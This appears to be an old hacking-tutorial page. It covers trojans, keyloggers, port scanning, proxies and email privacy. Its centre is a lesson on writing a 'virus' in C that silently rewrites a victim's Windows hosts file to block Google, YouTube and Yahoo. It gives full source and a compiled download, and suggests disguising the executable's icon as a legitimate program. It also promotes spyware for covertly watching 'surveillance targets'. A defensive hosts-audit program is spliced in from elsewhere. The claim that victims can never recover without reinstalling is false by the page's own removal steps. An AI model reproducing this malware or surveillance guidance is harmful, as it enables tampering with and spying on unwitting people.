Trojans and Backdoors

A Trojan horse is an unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown to (and probably unwanted by) the user.



  • It is a legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown to (and probably unwanted by) the user.

  • Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown to (and definitely unwanted by) the user.


Working of Trojans


  • The attacker gets access to the trojaned system as the system goes online.

  • Using the access provided by the trojan, the attacker can stage attacks of different types.


Various Trojan Types



  • Remote Access Trojans

  • Password Sending Trojans

  • Keyloggers

  • Destructive

  • Denial Of Service (DoS) Attack Trojans

  • Proxy/Wingate Trojans

  • FTP Trojans

  • Software Detection Killers


Modes of Transmission



  • Attachments

  • Physical Access

  • Browser And E-mail Software Bugs

  • NetBIOS (File Sharing)

  • Fake Programs

  • Un-trusted Sites And Freeware Software


Backdoor Countermeasures



  • Most commercial anti-virus products can automatically scan and detect backdoor programs before they can cause damage (e.g. before accessing a floppy, running an exe or downloading mail).

  • An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans.

  • Educate your users not to install applications downloaded from the internet and e-mail attachments.

Keyloggers (Keystroke Loggers)

Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.


There are two types of keystroke loggers:


1. Software based and

2. Hardware based.


Spyware: Spector (http://www.spector.com/)



  • Spector is spyware that records everything anyone does on the internet.

  • Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With Spector, you will be able to see exactly what your surveillance targets have been doing online and offline.

  • Spector works by taking a snapshot of whatever is on your computer screen and saving it in a hidden location on your computer’s hard drive.


Hacking Tool: eBlaster (http://www.spector.com/)


  • eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

  • eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

  • Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: Hardware Keylogger (http://www.keyghost.com)


     




  • The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

  • It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

Port Scanning

    Port Scanning is one of the most popular techniques used by hackers to discover services that can be compromised.



    • A potential target computer runs many ‘services’ that listen at ‘well-known’ ‘ports’.

    • By scanning which ports are available on the victim, the hacker finds potential vulnerabilities that can be exploited.

    • Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.


    Port Scanning Techniques




    Port Scanning Techniques can be broadly classified into:



    • Open scan

    • Half-open scan

    • Stealth scan

    • Sweeps

    • Misc


    Commonly used tools for port scanning


    1. Tool: SuperScan 3.0

    2. Tool: NMap (Network Mapper)



    3. Tool: NetScan Tools Pro 2003



    4. Tool: ipEye, IPSecScan


    Proxy Servers and Anonymizers


    A proxy is a network computer that can serve as an intermediary for connections with other computers. Proxies are usually used for the following purposes:


    • As a firewall, a proxy protects the local network from outside access.

    • As an IP address multiplexer, a proxy allows a number of computers to connect to the Internet when only one IP address is available.

    • Proxy servers can be used (to some extent) to anonymize web surfing.

    • Specialized proxy servers can filter out unwanted content, such as ads or ‘unsuitable’ material.

    • Proxy servers can afford some protection against hacking attacks.


    Anonymizers



    • Anonymizers are services that help make your own web surfing anonymous.

    • The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.

    • An anonymizer removes all the identifying information from a user’s computer while the user surfs the Internet, thereby ensuring the privacy of the user.

    Creating a Virus to Block Websites


    Most of us are familiar with the virus that used to block the Orkut and Youtube sites. If you are curious about creating such a virus on your own, then you are in the right place. Today I’ll teach you how to create a simple virus that blocks websites. And as usual I’ll use my favorite programming language, ‘C’, to create this website-blocking virus. I will give a brief introduction to this virus before I jump into the technical jargon.


    This virus has been created exclusively in ‘C’. So anyone with a basic knowledge of C will be able to understand the working of the virus. This virus needs to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-installs the operating system. This blocking is not confined to IE or Firefox, so once blocked, the site will not appear in any browser program.


    NOTE: You can also block a website manually. But here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website?


    Here is the source code of the virus.


    #include<stdio.h>
    #include<dos.h>
    #include<dir.h>

    char site_list[6][30]={
        "google.com",
        "www.google.com",
        "youtube.com",
        "www.youtube.com",
        "yahoo.com",
        "www.yahoo.com"
    };
    char ip[12]="127.0.0.1";
    FILE *target;

    int find_root(void);
    void block_site(void);

    int find_root()
    {
        int done;
        struct ffblk ffblk; //File block structure

        done=findfirst("C:\\windows\\system32\\drivers\\etc\\hosts",&ffblk,FA_DIREC);
        /*to determine the root drive*/
        if(done==0)
        {
            target=fopen("C:\\windows\\system32\\drivers\\etc\\hosts","r+");
            /*to open the file*/
            return 1;
        }

        done=findfirst("D:\\windows\\system32\\drivers\\etc\\hosts",&ffblk,FA_DIREC);
        /*to determine the root drive*/
        if(done==0)
        {
            target=fopen("D:\\windows\\system32\\drivers\\etc\\hosts","r+");
            /*to open the file*/
            return 1;
        }

        done=findfirst("E:\\windows\\system32\\drivers\\etc\\hosts",&ffblk,FA_DIREC);
        /*to determine the root drive*/
        if(done==0)
        {
            target=fopen("E:\\windows\\system32\\drivers\\etc\\hosts","r+");
            /*to open the file*/
            return 1;
        }

        done=findfirst("F:\\windows\\system32\\drivers\\etc\\hosts",&ffblk,FA_DIREC);
        /*to determine the root drive*/
        if(done==0)
        {
            target=fopen("F:\\windows\\system32\\drivers\\etc\\hosts","r+");
            /*to open the file*/
            return 1;
        }

        else return 0;
    }

    void block_site()
    {
        int i;
        fseek(target,0,SEEK_END); /*to move to the end of the file*/

        fprintf(target,"\n");
        for(i=0;i<6;i++)
            fprintf(target,"%s\t%s\n",ip,site_list[i]);
        fclose(target);
    }

    void main()
    {
        int success=0;
        success=find_root();
        if(success)
            block_site();
    }


    How to Compile ?


    1. Download the source code here. Download the compiled module(virus) here.


    2. Compile the sourcecode using any C/C++ compiler.


    3. To test, run the compiled module. It will block the sites that are listed in the source code.


    4. Once you run the file block_Site.exe, restart your browser program. Then type the URL of the blocked site and you’ll see the browser showing the error “Page cannot displayed“.


    5. To remove the virus, type the following in Run:

    %windir%\system32\drivers\etc


    6. There, open the file named “hosts” using Notepad. At the bottom of the opened file you’ll see something like this:


    127.0.0.1—————————google.com


    7. Delete all such entries which contain the names of blocked sites.
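
The manual check in the removal steps can be automated. The following is an added example, not code from the original post: it scans hosts-file text and reports every name pointed at a loopback or null address. The function names and the sample text are constructed for this example, and flagging 0.0.0.0 and ::1 goes beyond the 127.0.0.1 case the program above writes.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: stock entries plus lines in the form the program above appends. */
static const char SAMPLE_HOSTS[] =
    "127.0.0.1       localhost\n"
    "::1             localhost\n"
    "10.0.0.5        intranet.example   # ordinary static mapping\n"
    "127.0.0.1\tgoogle.com\n"
    "127.0.0.1\twww.google.com\n"
    "127.0.0.1\tYouTube.com www.youtube.com\n";

/* Addresses that make a name unreachable when a hosts entry points at them. */
static int is_sinkhole(const char *ip)
{
    return !strncmp(ip, "127.", 4) || !strcmp(ip, "0.0.0.0") || !strcmp(ip, "::1");
}

/* Count non-localhost names mapped to a sinkhole; print each to out if non-NULL. */
int audit_hosts(const char *text, FILE *out)
{
    int findings = 0, lineno = 0;
    while (*text) {
        char line[512], *ip, *name;
        size_t len = strcspn(text, "\n");
        size_t n = len < sizeof line - 1 ? len : sizeof line - 1;
        memcpy(line, text, n);
        line[n] = '\0';
        text += len + (text[len] == '\n');        /* advance past this line */
        lineno++;
        line[strcspn(line, "#")] = '\0';          /* drop comments */
        for (char *p = line; *p; p++)             /* names are case-insensitive */
            *p = (char)tolower((unsigned char)*p);
        ip = strtok(line, " \t\r");
        if (ip == NULL || !is_sinkhole(ip))
            continue;
        while ((name = strtok(NULL, " \t\r")) != NULL) {
            if (strcmp(name, "localhost") == 0)
                continue;                         /* expected stock mapping */
            findings++;
            if (out)
                fprintf(out, "line %d: %s -> %s\n", lineno, name, ip);
        }
    }
    return findings;
}

int main(void) { printf("%d flagged\n", audit_hosts(SAMPLE_HOSTS, stdout)); return 0; }
```

Entries added on purpose, such as an ad-blocking hosts list, are flagged as well, so compare the output against a known-good copy of the file.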


    NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file?

    Common Terminologies used in Internet Security


    If you are a newbie in Internet security, you have come to the right place. The following is information on some common terms used in Internet security. So next time you don’t have to scratch your head when someone uses these.


    Firewall – is a system that acts as a barrier between your computer network and the Internet. A firewall controls the flow of information according to security policies.


    Hacker – can be anyone specializing in accessing computer based systems for illegal purposes or just for the fun of it.


    IP spoofing – is an attempt to access your system by pretending to be another system. This is done by setting up a system with an IP address that you normally trust.


    Sniffing – is the spying on electronic transmissions to access data. This mostly occurs in privately owned LAN networks connected to the web.


    Trojan horse – is a program pretending to be useful software, while its actual strategy is to access, steal or destroy user data and access authorization. Apart from destroying information, trojans can also create a backdoor on your system for stealing confidential information.


    Virus – is a program that attaches itself to a program or file. This allows it to spread across networks and cause damage to software and hardware. To operate, viruses require the execution of the attached file.


    Worm – is almost similar to a virus, except that it doesn’t need the execution of any executable file to get activated. It can also replicate itself as it travels across networks.

    Tips to improve Email Privacy


    Many websites ask for your email address when you shop online, download free software etc. But do you know that this has a chance of affecting your email privacy through spam emails?


    Though most websites don’t use spamming as an email marketing strategy, there are a few that send junk emails and don’t care about anti-spam laws. Here are some tips to maintain your email privacy from such threats.

    Before submitting your email address you need to check the reputation of the company. Reputed websites would normally follow the right email practices to ensure your email privacy. Such companies will never want to lose their hard-earned reputation by getting blamed for spamming.


    See whether the website provides an email privacy statement. You need to go through this statement in detail, and know about the kind of emails that will be sent to you, how often etc. Based on this you can decide whether you need such emails. You don’t want to give your email address to some fraud company that is thinking about handing over your email address to hundreds of other websites.


    Finally, check whether the website really respects your privacy. Often you will find some text like “I agree to receive email” that comes with a check box. You can agree to receive emails by checking the check box. If the check box is already checked, it is a good indication that the website doesn’t respect your privacy. So watch out!